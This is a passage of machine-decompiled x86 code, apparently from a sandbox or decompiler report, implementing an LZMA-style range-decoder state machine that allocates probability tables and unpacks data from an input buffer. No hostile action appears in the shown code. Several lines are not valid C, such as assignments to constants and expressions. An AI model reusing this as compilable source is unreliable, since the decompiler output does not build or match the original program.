							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
